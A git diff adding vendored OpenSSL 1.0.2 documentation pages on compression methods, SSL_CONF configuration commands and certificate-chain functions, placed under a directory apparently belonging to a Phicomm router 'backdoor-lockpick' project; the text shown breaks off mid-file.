+ int SSL_COMP_add_compression_method(int id, COMP_METHOD *cm);
+
+=head1 DESCRIPTION
+
+SSL_COMP_add_compression_method() adds the compression method B<cm> with
+the identifier B<id> to the list of available compression methods. This
+list is globally maintained for all SSL operations within this application.
+It cannot be set for specific SSL_CTX or SSL objects.
+
+=head1 NOTES
+
+The TLS standard (or SSLv3) allows the integration of compression methods
+into the communication. The TLS RFC does however not specify compression
+methods or their corresponding identifiers, so there is currently no compatible
+way to integrate compression with unknown peers. It is therefore currently not
+recommended to integrate compression into applications. Applications for
+non-public use may agree on certain compression methods. Using different
+compression methods with the same identifier will lead to connection failure.
+
+An OpenSSL client speaking a protocol that allows compression (SSLv3, TLSv1)
+will unconditionally send the list of all compression methods enabled with
+SSL_COMP_add_compression_method() to the server during the handshake.
+Unlike the mechanisms to set a cipher list, there is no method available to
+restrict the list of compression method on a per connection basis.
+
+An OpenSSL server will match the identifiers listed by a client against
+its own compression methods and will unconditionally activate compression
+when a matching identifier is found. There is no way to restrict the list
+of compression methods supported on a per connection basis.
+
+The OpenSSL library has the compression methods B<COMP_rle()> and (when
+especially enabled during compilation) B<COMP_zlib()> available.
+
+=head1 WARNINGS
+
+Once the identities of the compression methods for the TLS protocol have
+been standardized, the compression API will most likely be changed. Using
+it in the current state is not recommended.
+
+=head1 RETURN VALUES
+
+SSL_COMP_add_compression_method() may return the following values:
+
+=over 4
+
+=item Z<>0
+
+The operation succeeded.
+
+=item Z<>1
+
+The operation failed. Check the error queue to find out the reason.
+
+=back
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_new.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_new.pod
new file mode 100644
index 0000000..a9ccb04
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_new.pod
@@ -0,0 +1,40 @@
+=pod
+
+=head1 NAME
+
+SSL_CONF_CTX_new, SSL_CONF_CTX_free - SSL configuration allocation functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ SSL_CONF_CTX *SSL_CONF_CTX_new(void);
+ void SSL_CONF_CTX_free(SSL_CONF_CTX *cctx);
+
+=head1 DESCRIPTION
+
+The function SSL_CONF_CTX_new() allocates and initialises an B<SSL_CONF_CTX>
+structure for use with the SSL_CONF functions.
+
+The function SSL_CONF_CTX_free() frees up the context B<cctx>.
+
+=head1 RETURN VALUES
+
+SSL_CONF_CTX_new() returns either the newly allocated B<SSL_CONF_CTX> structure
+or B<NULL> if an error occurs.
+
+SSL_CONF_CTX_free() does not return a value.
+
+=head1 SEE ALSO
+
+L<SSL_CONF_CTX_set_flags(3)|SSL_CONF_CTX_set_flags(3)>,
+L<SSL_CONF_CTX_set_ssl_ctx(3)|SSL_CONF_CTX_set_ssl_ctx(3)>,
+L<SSL_CONF_CTX_set1_prefix(3)|SSL_CONF_CTX_set1_prefix(3)>,
+L<SSL_CONF_cmd(3)|SSL_CONF_cmd(3)>,
+L<SSL_CONF_cmd_argv(3)|SSL_CONF_cmd_argv(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.2
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set1_prefix.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set1_prefix.pod
new file mode 100644
index 0000000..7699018
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set1_prefix.pod
@@ -0,0 +1,49 @@
+=pod
+
+=head1 NAME
+
+SSL_CONF_CTX_set1_prefix - Set configuration context command prefix
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ unsigned int SSL_CONF_CTX_set1_prefix(SSL_CONF_CTX *cctx, const char *prefix);
+
+=head1 DESCRIPTION
+
+The function SSL_CONF_CTX_set1_prefix() sets the command prefix of B<cctx>
+to B<prefix>. If B<prefix> is B<NULL> it is restored to the default value.
+
+=head1 NOTES
+
+Command prefixes alter the commands recognised by subsequent SSL_CTX_cmd()
+calls. For example for files, if the prefix "SSL" is set then command names
+such as "SSLProtocol", "SSLOptions" etc. are recognised instead of "Protocol"
+and "Options". Similarly for command lines if the prefix is "--ssl-" then 
+"--ssl-no_tls1_2" is recognised instead of "-no_tls1_2".
+
+If the B<SSL_CONF_FLAG_CMDLINE> flag is set then prefix checks are case
+sensitive and "-" is the default. In the unlikely even an application
+explicitly wants to set no prefix it must be explicitly set to "".
+
+If the B<SSL_CONF_FLAG_FILE> flag is set then prefix checks are case
+insensitive and no prefix is the default.
+
+=head1 RETURN VALUES
+
+SSL_CONF_CTX_set1_prefix() returns 1 for success and 0 for failure.
+
+=head1 SEE ALSO
+
+L<SSL_CONF_CTX_new(3)|SSL_CONF_CTX_new(3)>,
+L<SSL_CONF_CTX_set_flags(3)|SSL_CONF_CTX_set_flags(3)>,
+L<SSL_CONF_CTX_set_ssl_ctx(3)|SSL_CONF_CTX_set_ssl_ctx(3)>,
+L<SSL_CONF_cmd(3)|SSL_CONF_cmd(3)>,
+L<SSL_CONF_cmd_argv(3)|SSL_CONF_cmd_argv(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.2
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set_flags.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set_flags.pod
new file mode 100644
index 0000000..ab87efc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set_flags.pod
@@ -0,0 +1,68 @@
+=pod
+
+=head1 NAME
+
+SSL_CONF_CTX_set_flags, SSL_CONF_CTX_clear_flags - Set of clear SSL configuration context flags
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ unsigned int SSL_CONF_CTX_set_flags(SSL_CONF_CTX *cctx, unsigned int flags);
+ unsigned int SSL_CONF_CTX_clear_flags(SSL_CONF_CTX *cctx, unsigned int flags);
+
+=head1 DESCRIPTION
+
+The function SSL_CONF_CTX_set_flags() sets B<flags> in the context B<cctx>.
+
+The function SSL_CONF_CTX_clear_flags() clears B<flags> in the context B<cctx>.
+
+=head1 NOTES
+
+The flags set affect how subsequent calls to SSL_CONF_cmd() or
+SSL_CONF_argv() behave.
+
+Currently the following B<flags> values are recognised:
+
+=over 4
+
+=item SSL_CONF_FLAG_CMDLINE, SSL_CONF_FLAG_FILE
+
+recognise options intended for command line or configuration file use. At
+least one of these flags must be set.
+
+=item SSL_CONF_FLAG_CLIENT, SSL_CONF_FLAG_SERVER
+
+recognise options intended for use in SSL/TLS clients or servers. One or
+both of these flags must be set.
+
+=item SSL_CONF_CERTIFICATE
+
+recognise certificate and private key options.
+
+=item SSL_CONF_FLAG_SHOW_ERRORS
+
+indicate errors relating to unrecognised options or missing arguments in
+the error queue. If this option isn't set such errors are only reflected
+in the return values of SSL_CONF_set_cmd() or SSL_CONF_set_argv()
+
+=back
+
+=head1 RETURN VALUES
+
+SSL_CONF_CTX_set_flags() and SSL_CONF_CTX_clear_flags() returns the new flags
+value after setting or clearing flags.
+
+=head1 SEE ALSO
+
+L<SSL_CONF_CTX_new(3)|SSL_CONF_CTX_new(3)>,
+L<SSL_CONF_CTX_set_ssl_ctx(3)|SSL_CONF_CTX_set_ssl_ctx(3)>,
+L<SSL_CONF_CTX_set1_prefix(3)|SSL_CONF_CTX_set1_prefix(3)>,
+L<SSL_CONF_cmd(3)|SSL_CONF_cmd(3)>,
+L<SSL_CONF_cmd_argv(3)|SSL_CONF_cmd_argv(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.2
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set_ssl_ctx.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set_ssl_ctx.pod
new file mode 100644
index 0000000..2049a53
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_CTX_set_ssl_ctx.pod
@@ -0,0 +1,47 @@
+=pod
+
+=head1 NAME
+
+SSL_CONF_CTX_set_ssl_ctx, SSL_CONF_CTX_set_ssl - set context to configure
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ void SSL_CONF_CTX_set_ssl_ctx(SSL_CONF_CTX *cctx, SSL_CTX *ctx);
+ void SSL_CONF_CTX_set_ssl(SSL_CONF_CTX *cctx, SSL *ssl);
+
+=head1 DESCRIPTION
+
+SSL_CONF_CTX_set_ssl_ctx() sets the context associated with B<cctx> to the
+B<SSL_CTX> structure B<ctx>. Any previous B<SSL> or B<SSL_CTX> associated with
+B<cctx> is cleared. Subsequent calls to SSL_CONF_cmd() will be sent to
+B<ctx>.
+
+SSL_CONF_CTX_set_ssl() sets the context associated with B<cctx> to the
+B<SSL> structure B<ssl>. Any previous B<SSL> or B<SSL_CTX> associated with
+B<cctx> is cleared. Subsequent calls to SSL_CONF_cmd() will be sent to
+B<ssl>.
+
+=head1 NOTES
+
+The context need not be set or it can be set to B<NULL> in which case only
+syntax checking of commands is performed, where possible.
+
+=head1 RETURN VALUES
+
+SSL_CONF_CTX_set_ssl_ctx() and SSL_CTX_set_ssl() do not return a value.
+
+=head1 SEE ALSO
+
+L<SSL_CONF_CTX_new(3)|SSL_CONF_CTX_new(3)>,
+L<SSL_CONF_CTX_set_flags(3)|SSL_CONF_CTX_set_flags(3)>,
+L<SSL_CONF_CTX_set1_prefix(3)|SSL_CONF_CTX_set1_prefix(3)>,
+L<SSL_CONF_cmd(3)|SSL_CONF_cmd(3)>,
+L<SSL_CONF_cmd_argv(3)|SSL_CONF_cmd_argv(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.2
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_cmd.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_cmd.pod
new file mode 100644
index 0000000..6d073cb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_cmd.pod
@@ -0,0 +1,433 @@
+=pod
+
+=head1 NAME
+
+SSL_CONF_cmd - send configuration command
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CONF_cmd(SSL_CONF_CTX *cctx, const char *cmd, const char *value);
+ int SSL_CONF_cmd_value_type(SSL_CONF_CTX *cctx, const char *cmd);
+ int SSL_CONF_finish(SSL_CONF_CTX *cctx);
+
+=head1 DESCRIPTION
+
+The function SSL_CONF_cmd() performs configuration operation B<cmd> with
+optional parameter B<value> on B<ctx>. Its purpose is to simplify application
+configuration of B<SSL_CTX> or B<SSL> structures by providing a common
+framework for command line options or configuration files.
+
+SSL_CONF_cmd_value_type() returns the type of value that B<cmd> refers to.
+
+The function SSL_CONF_finish() must be called after all configuration
+operations have been completed. It is used to finalise any operations
+or to process defaults.
+
+=head1 SUPPORTED COMMAND LINE COMMANDS
+
+Currently supported B<cmd> names for command lines (i.e. when the
+flag B<SSL_CONF_CMDLINE> is set) are listed below. Note: all B<cmd> names
+are case sensitive. Unless otherwise stated commands can be used by
+both clients and servers and the B<value> parameter is not used. The default
+prefix for command line commands is B<-> and that is reflected below.
+
+=over 4
+
+=item B<-sigalgs>
+
+This sets the supported signature algorithms for TLS v1.2. For clients this
+value is used directly for the supported signature algorithms extension. For
+servers it is used to determine which signature algorithms to support.
+
+The B<value> argument should be a colon separated list of signature algorithms
+in order of decreasing preference of the form B<algorithm+hash>. B<algorithm>
+is one of B<RSA>, B<DSA> or B<ECDSA> and B<hash> is a supported algorithm
+OID short name such as B<SHA1>, B<SHA224>, B<SHA256>, B<SHA384> of B<SHA512>.
+Note: algorithm and hash names are case sensitive.
+
+If this option is not set then all signature algorithms supported by the
+OpenSSL library are permissible.
+
+=item B<-client_sigalgs>
+
+This sets the supported signature algorithms associated with client
+authentication for TLS v1.2. For servers the value is used in the supported
+signature algorithms field of a certificate request. For clients it is
+used to determine which signature algorithm to with the client certificate.
+If a server does not request a certificate this option has no effect.
+
+The syntax of B<value> is identical to B<-sigalgs>. If not set then
+the value set for B<-sigalgs> will be used instead.
+
+=item B<-curves>
+
+This sets the supported elliptic curves. For clients the curves are
+sent using the supported curves extension. For servers it is used
+to determine which curve to use. This setting affects curves used for both
+signatures and key exchange, if applicable.
+
+The B<value> argument is a colon separated list of curves. The curve can be
+either the B<NIST> name (e.g. B<P-256>) or an OpenSSL OID name (e.g
+B<prime256v1>). Curve names are case sensitive.
+
+=item B<-named_curve>
+
+This sets the temporary curve used for ephemeral ECDH modes. Only used by 
+servers
+
+The B<value> argument is a curve name or the special value B<auto> which
+picks an appropriate curve based on client and server preferences. The curve
+can be either the B<NIST> name (e.g. B<P-256>) or an OpenSSL OID name
+(e.g B<prime256v1>). Curve names are case sensitive.
+
+=item B<-cipher>
+
+Sets the cipher suite list to B<value>. Note: syntax checking of B<value> is
+currently not performed unless a B<SSL> or B<SSL_CTX> structure is 
+associated with B<cctx>.
+
+=item B<-cert>
+
+Attempts to use the file B<value> as the certificate for the appropriate
+context. It currently uses SSL_CTX_use_certificate_chain_file() if an B<SSL_CTX>
+structure is set or SSL_use_certificate_file() with filetype PEM if an B<SSL>
+structure is set. This option is only supported if certificate operations
+are permitted.
+
+=item B<-key>
+
+Attempts to use the file B<value> as the private key for the appropriate
+context. This option is only supported if certificate operations
+are permitted. Note: if no B<-key> option is set then a private key is
+not loaded: it does not currently use the B<-cert> file.
+
+=item B<-dhparam>
+
+Attempts to use the file B<value> as the set of temporary DH parameters for
+the appropriate context. This option is only supported if certificate
+operations are permitted.
+
+=item B<-no_ssl2>, B<-no_ssl3>, B<-no_tls1>, B<-no_tls1_1>, B<-no_tls1_2>
+
+Disables protocol support for SSLv2, SSLv3, TLS 1.0, TLS 1.1 or TLS 1.2 
+by setting the corresponding options B<SSL_OP_NO_SSL2>, B<SSL_OP_NO_SSL3>,
+B<SSL_OP_NO_TLS1>, B<SSL_OP_NO_TLS1_1> and B<SSL_OP_NO_TLS1_2> respectively.
+
+=item B<-bugs>
+
+Various bug workarounds are set, same as setting B<SSL_OP_ALL>.
+
+=item B<-no_comp>
+
+Disables support for SSL/TLS compression, same as setting B<SSL_OP_NO_COMPRESS>.
+
+=item B<-no_ticket>
+
+Disables support for session tickets, same as setting B<SSL_OP_NO_TICKET>.
+
+=item B<-serverpref>
+
+Use server and not client preference order when determining which cipher suite,
+signature algorithm or elliptic curve to use for an incoming connection.
+Equivalent to B<SSL_OP_CIPHER_SERVER_PREFERENCE>. Only used by servers.
+
+=item B<-no_resumption_on_reneg>
+
+set SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION flag. Only used by servers.
+
+=item B<-legacyrenegotiation>
+
+permits the use of unsafe legacy renegotiation. Equivalent to setting
+B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION>.
+
+=item B<-legacy_server_connect>, B<-no_legacy_server_connect>
+
+permits or prohibits the use of unsafe legacy renegotiation for OpenSSL
+clients only. Equivalent to setting or clearing B<SSL_OP_LEGACY_SERVER_CONNECT>.
+Set by default.
+
+=item B<-strict>
+
+enables strict mode protocol handling. Equivalent to setting
+B<SSL_CERT_FLAG_TLS_STRICT>.
+
+=item B<-debug_broken_protocol>
+
+disables various checks and permits several kinds of broken protocol behaviour
+for testing purposes: it should B<NEVER> be used in anything other than a test
+environment. Only supported if OpenSSL is configured with
+B<-DOPENSSL_SSL_DEBUG_BROKEN_PROTOCOL>.
+
+=back
+
+=head1 SUPPORTED CONFIGURATION FILE COMMANDS
+
+Currently supported B<cmd> names for configuration files (i.e. when the
+flag B<SSL_CONF_FLAG_FILE> is set) are listed below. All configuration file
+B<cmd> names and are case insensitive so B<signaturealgorithms> is recognised
+as well as B<SignatureAlgorithms>. Unless otherwise stated the B<value> names
+are also case insensitive.
+
+Note: the command prefix (if set) alters the recognised B<cmd> values.
+
+=over 4
+
+=item B<CipherString>
+
+Sets the cipher suite list to B<value>. Note: syntax checking of B<value> is
+currently not performed unless an B<SSL> or B<SSL_CTX> structure is 
+associated with B<cctx>.
+
+=item B<Certificate>
+
+Attempts to use the file B<value> as the certificate for the appropriate
+context. It currently uses SSL_CTX_use_certificate_chain_file() if an B<SSL_CTX>
+structure is set or SSL_use_certificate_file() with filetype PEM if an B<SSL>
+structure is set. This option is only supported if certificate operations
+are permitted.
+
+=item B<PrivateKey>
+
+Attempts to use the file B<value> as the private key for the appropriate
+context. This option is only supported if certificate operations
+are permitted. Note: if no B<-key> option is set then a private key is
+not loaded: it does not currently use the B<Certificate> file.
+
+=item B<DHParameters>
+
+Attempts to use the file B<value> as the set of temporary DH parameters for
+the appropriate context. This option is only supported if certificate
+operations are permitted.
+
+=item B<SignatureAlgorithms>
+
+This sets the supported signature algorithms for TLS v1.2. For clients this
+value is used directly for the supported signature algorithms extension. For
+servers it is used to determine which signature algorithms to support.
+
+The B<value> argument should be a colon separated list of signature algorithms
+in order of decreasing preference of the form B<algorithm+hash>. B<algorithm>
+is one of B<RSA>, B<DSA> or B<ECDSA> and B<hash> is a supported algorithm
+OID short name such as B<SHA1>, B<SHA224>, B<SHA256>, B<SHA384> of B<SHA512>.
+Note: algorithm and hash names are case sensitive.
+
+If this option is not set then all signature algorithms supported by the
+OpenSSL library are permissible.
+
+=item B<ClientSignatureAlgorithms>
+
+This sets the supported signature algorithms associated with client
+authentication for TLS v1.2. For servers the value is used in the supported
+signature algorithms field of a certificate request. For clients it is
+used to determine which signature algorithm to with the client certificate.
+
+The syntax of B<value> is identical to B<SignatureAlgorithms>. If not set then
+the value set for B<SignatureAlgorithms> will be used instead.
+
+=item B<Curves>
+
+This sets the supported elliptic curves. For clients the curves are
+sent using the supported curves extension. For servers it is used
+to determine which curve to use. This setting affects curves used for both
+signatures and key exchange, if applicable.
+
+The B<value> argument is a colon separated list of curves. The curve can be
+either the B<NIST> name (e.g. B<P-256>) or an OpenSSL OID name (e.g
+B<prime256v1>). Curve names are case sensitive.
+
+=item B<ECDHParameters>
+
+This sets the temporary curve used for ephemeral ECDH modes. Only used by 
+servers
+
+The B<value> argument is a curve name or the special value B<Automatic> which
+picks an appropriate curve based on client and server preferences. The curve
+can be either the B<NIST> name (e.g. B<P-256>) or an OpenSSL OID name
+(e.g B<prime256v1>). Curve names are case sensitive.
+
+=item B<Protocol>
+
+The supported versions of the SSL or TLS protocol.
+
+The B<value> argument is a comma separated list of supported protocols to
+enable or disable. If an protocol is preceded by B<-> that version is disabled.
+All versions are enabled by default, though applications may choose to
+explicitly disable some. Currently supported protocol values are B<SSLv2>,
+B<SSLv3>, B<TLSv1>, B<TLSv1.1> and B<TLSv1.2>. The special value B<ALL> refers
+to all supported versions.
+
+=item B<Options>
+
+The B<value> argument is a comma separated list of various flags to set.
+If a flag string is preceded B<-> it is disabled. See the
+B<SSL_CTX_set_options> function for more details of individual options.
+
+Each option is listed below. Where an operation is enabled by default
+the B<-flag> syntax is needed to disable it.
+
+B<SessionTicket>: session ticket support, enabled by default. Inverse of
+B<SSL_OP_NO_TICKET>: that is B<-SessionTicket> is the same as setting
+B<SSL_OP_NO_TICKET>.
+
+B<Compression>: SSL/TLS compression support, enabled by default. Inverse
+of B<SSL_OP_NO_COMPRESSION>.
+
+B<EmptyFragments>: use empty fragments as a countermeasure against a
+SSL 3.0/TLS 1.0 protocol vulnerability affecting CBC ciphers. It
+is set by default. Inverse of B<SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS>.
+
+B<Bugs>: enable various bug workarounds. Same as B<SSL_OP_ALL>.
+
+B<DHSingle>: enable single use DH keys, set by default. Inverse of
+B<SSL_OP_DH_SINGLE>. Only used by servers.
+
+B<ECDHSingle> enable single use ECDH keys, set by default. Inverse of
+B<SSL_OP_ECDH_SINGLE>. Only used by servers.
+
+B<ServerPreference> use server and not client preference order when
+determining which cipher suite, signature algorithm or elliptic curve
+to use for an incoming connection.  Equivalent to
+B<SSL_OP_CIPHER_SERVER_PREFERENCE>. Only used by servers.
+
+B<NoResumptionOnRenegotiation> set
+B<SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION> flag. Only used by servers.
+
+B<UnsafeLegacyRenegotiation> permits the use of unsafe legacy renegotiation.
+Equivalent to B<SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION>.
+
+B<UnsafeLegacyServerConnect> permits the use of unsafe legacy renegotiation
+for OpenSSL clients only. Equivalent to B<SSL_OP_LEGACY_SERVER_CONNECT>.
+Set by default.
+
+=back
+
+=head1 SUPPORTED COMMAND TYPES
+
+The function SSL_CONF_cmd_value_type() currently returns one of the following
+types:
+
+=over 4
+
+=item B<SSL_CONF_TYPE_UNKNOWN>
+
+The B<cmd> string is unrecognised, this return value can be use to flag
+syntax errors.
+
+=item B<SSL_CONF_TYPE_STRING>
+
+The value is a string without any specific structure.
+
+=item B<SSL_CONF_TYPE_FILE>
+
+The value is a file name.
+
+=item B<SSL_CONF_TYPE_DIR>
+
+The value is a directory name.
+
+=back
+
+=head1 NOTES
+
+The order of operations is significant. This can be used to set either defaults
+or values which cannot be overridden. For example if an application calls:
+
+ SSL_CONF_cmd(ctx, "Protocol", "-SSLv2");
+ SSL_CONF_cmd(ctx, userparam, uservalue);
+
+it will disable SSLv2 support by default but the user can override it. If 
+however the call sequence is:
+
+ SSL_CONF_cmd(ctx, userparam, uservalue);
+ SSL_CONF_cmd(ctx, "Protocol", "-SSLv2");
+
+SSLv2 is B<always> disabled and attempt to override this by the user are
+ignored.
+
+By checking the return code of SSL_CTX_cmd() it is possible to query if a
+given B<cmd> is recognised, this is useful is SSL_CTX_cmd() values are
+mixed with additional application specific operations.
+
+For example an application might call SSL_CTX_cmd() and if it returns
+-2 (unrecognised command) continue with processing of application specific
+commands.
+
+Applications can also use SSL_CTX_cmd() to process command lines though the
+utility function SSL_CTX_cmd_argv() is normally used instead. One way
+to do this is to set the prefix to an appropriate value using
+SSL_CONF_CTX_set1_prefix(), pass the current argument to B<cmd> and the
+following argument to B<value> (which may be NULL).
+
+In this case if the return value is positive then it is used to skip that
+number of arguments as they have been processed by SSL_CTX_cmd(). If -2 is
+returned then B<cmd> is not recognised and application specific arguments
+can be checked instead. If -3 is returned a required argument is missing
+and an error is indicated. If 0 is returned some other error occurred and
+this can be reported back to the user.
+
+The function SSL_CONF_cmd_value_type() can be used by applications to 
+check for the existence of a command or to perform additional syntax
+checking or translation of the command value. For example if the return
+value is B<SSL_CONF_TYPE_FILE> an application could translate a relative
+pathname to an absolute pathname.
+
+=head1 EXAMPLES
+
+Set supported signature algorithms:
+
+ SSL_CONF_cmd(ctx, "SignatureAlgorithms", "ECDSA+SHA256:RSA+SHA256:DSA+SHA256");
+
+Enable all protocols except SSLv3 and SSLv2:
+
+ SSL_CONF_cmd(ctx, "Protocol", "ALL,-SSLv3,-SSLv2");
+
+Only enable TLSv1.2:
+
+ SSL_CONF_cmd(ctx, "Protocol", "-ALL,TLSv1.2");
+
+Disable TLS session tickets:
+
+ SSL_CONF_cmd(ctx, "Options", "-SessionTicket");
+
+Set supported curves to P-256, P-384:
+
+ SSL_CONF_cmd(ctx, "Curves", "P-256:P-384");
+
+Set automatic support for any elliptic curve for key exchange:
+
+ SSL_CONF_cmd(ctx, "ECDHParameters", "Automatic");
+
+=head1 RETURN VALUES
+
+SSL_CONF_cmd() returns 1 if the value of B<cmd> is recognised and B<value> is
+B<NOT> used and 2 if both B<cmd> and B<value> are used. In other words it
+returns the number of arguments processed. This is useful when processing
+command lines.
+
+A return value of -2 means B<cmd> is not recognised.
+
+A return value of -3 means B<cmd> is recognised and the command requires a
+value but B<value> is NULL.
+
+A return code of 0 indicates that both B<cmd> and B<value> are valid but an
+error occurred attempting to perform the operation: for example due to an
+error in the syntax of B<value> in this case the error queue may provide
+additional information.
+
+SSL_CONF_finish() returns 1 for success and 0 for failure.
+
+=head1 SEE ALSO
+
+L<SSL_CONF_CTX_new(3)|SSL_CONF_CTX_new(3)>,
+L<SSL_CONF_CTX_set_flags(3)|SSL_CONF_CTX_set_flags(3)>,
+L<SSL_CONF_CTX_set1_prefix(3)|SSL_CONF_CTX_set1_prefix(3)>,
+L<SSL_CONF_CTX_set_ssl_ctx(3)|SSL_CONF_CTX_set_ssl_ctx(3)>,
+L<SSL_CONF_cmd_argv(3)|SSL_CONF_cmd_argv(3)>
+
+=head1 HISTORY
+
+SSL_CONF_cmd() was first added to OpenSSL 1.0.2
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_cmd_argv.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_cmd_argv.pod
new file mode 100644
index 0000000..6e66441
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CONF_cmd_argv.pod
@@ -0,0 +1,42 @@
+=pod
+
+=head1 NAME
+
+SSL_CONF_cmd_argv - SSL configuration command line processing.
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CONF_cmd_argv(SSL_CONF_CTX *cctx, int *pargc, char ***pargv);
+
+=head1 DESCRIPTION
+
+The function SSL_CONF_cmd_argv() processes at most two command line
+arguments from B<pargv> and B<pargc>. The values of B<pargv> and B<pargc>
+are updated to reflect the number of command options processed. The B<pargc>
+argument can be set to B<NULL> is it is not used.
+
+=head1 RETURN VALUES
+
+SSL_CONF_cmd_argv() returns the number of command arguments processed: 0, 1, 2
+or a negative error code.
+
+If -2 is returned then an argument for a command is missing.
+
+If -1 is returned the command is recognised but couldn't be processed due
+to an error: for example a syntax error in the argument.
+
+=head1 SEE ALSO
+
+L<SSL_CONF_CTX_new(3)|SSL_CONF_CTX_new(3)>,
+L<SSL_CONF_CTX_set_flags(3)|SSL_CONF_CTX_set_flags(3)>,
+L<SSL_CONF_CTX_set1_prefix(3)|SSL_CONF_CTX_set1_prefix(3)>,
+L<SSL_CONF_CTX_set_ssl_ctx(3)|SSL_CONF_CTX_set_ssl_ctx(3)>,
+L<SSL_CONF_cmd(3)|SSL_CONF_cmd(3)>
+
+=head1 HISTORY
+
+These functions were first added to OpenSSL 1.0.2
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add1_chain_cert.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add1_chain_cert.pod
new file mode 100644
index 0000000..b999f09
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/SSL_CTX_add1_chain_cert.pod
@@ -0,0 +1,150 @@
+=pod
+
+=head1 NAME
+
+SSL_CTX_set0_chain, SSL_CTX_set1_chain, SSL_CTX_add0_chain_cert,
+SSL_CTX_add1_chain_cert, SSL_CTX_get0_chain_certs, SSL_CTX_clear_chain_certs,
+SSL_set0_chain, SSL_set1_chain, SSL_add0_chain_cert, SSL_add1_chain_cert,
+SSL_get0_chain_certs, SSL_clear_chain_certs, SSL_CTX_build_cert_chain,
+SSL_build_cert_chain, SSL_CTX_select_current_cert,
+SSL_select_current_cert, SSL_CTX_set_current_cert, SSL_set_current_cert - extra
+chain certificate processing
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ int SSL_CTX_set0_chain(SSL_CTX *ctx, STACK_OF(X509) *sk);
+ int SSL_CTX_set1_chain(SSL_CTX *ctx, STACK_OF(X509) *sk);
+ int SSL_CTX_add0_chain_cert(SSL_CTX *ctx, X509 *x509);
+ int SSL_CTX_add1_chain_cert(SSL_CTX *ctx, X509 *x509);
+ int SSL_CTX_get0_chain_certs(SSL_CTX *ctx, STACK_OF(X509) **sk);
+ int SSL_CTX_clear_chain_certs(SSL_CTX *ctx);
+
+ int SSL_set0_chain(SSL *ssl, STACK_OF(X509) *sk);
+ int SSL_set1_chain(SSL *ssl, STACK_OF(X509) *sk);
+ int SSL_add0_chain_cert(SSL *ssl, X509 *x509);
+ int SSL_add1_chain_cert(SSL *ssl, X509 *x509);
+ int SSL_get0_chain_certs(SSL *ssl, STACK_OF(X509) **sk);
+ int SSL_clear_chain_certs(SSL *ssl);
+
+ int SSL_CTX_build_cert_chain(SSL_CTX *ctx, flags);
+ int SSL_build_cert_chain(SSL *ssl, flags);
+
+ int SSL_CTX_select_current_cert(SSL_CTX *ctx, X509 *x509);
+ int SSL_select_current_cert(SSL *ssl, X509 *x509);
+ int SSL_CTX_set_current_cert(SSL_CTX *ctx, long op);
+ int SSL_set_current_cert(SSL *ssl, long op);
+
+=head1 DESCRIPTION
+
+SSL_CTX_set0_chain() and SSL_CTX_set1_chain() set the certificate chain
+associated with the current certificate of B<ctx> to B<sk>.
+
+SSL_CTX_add0_chain_cert() and SSL_CTX_add1_chain_cert() append the single
+certificate B<x509> to the chain associated with the current certificate of
+B<ctx>.
+
+SSL_CTX_get0_chain_certs() retrieves the chain associated with the current
+certificate of B<ctx>.
+
